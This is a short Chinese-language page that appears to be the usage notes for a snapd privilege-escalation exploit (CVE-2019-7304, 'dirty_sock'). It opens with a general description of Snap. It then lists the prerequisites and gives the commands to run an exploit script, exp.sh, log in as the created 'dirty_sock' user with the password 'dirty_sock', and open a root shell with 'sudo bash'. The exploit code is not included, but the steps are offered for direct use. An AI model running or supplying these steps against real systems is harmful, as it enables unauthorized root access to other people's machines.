通过 snap(d) 实现 Linux 权限提升的另一种利用方法 (CVE-2019-7304)
Snap 是 Canonical 为使用 Linux 内核的 操作系统 开发的软件 打包 和 部署 系统。这些包被称为 snaps,而用于管理它们的工具 snapd 可在多种 Linux 发行版 上运行,并允许 上游 软件开发者直接将他们的应用程序分发给用户。Snaps 是自包含的应用程序,在沙盒中运行,并通过中介访问主机系统。Snap 最初是为 云 应用程序发布的[1],但后来被移植到 物联网 设备[3][4] 和桌面[5][6] 应用程序上。
dirty_sock:Linux 权限提升(通过 snapd)
- 系统上已安装 snap
- 你对 snap 拥有 sudo 权限(带或不带密码)
./exp.sh "snap_path" "pwd"
示例:
./exp.sh "/usr/bin/snap" "/home/evil"
然后你可以使用:
su - dirty_sock
dirty_sock(作为密码)
sudo bash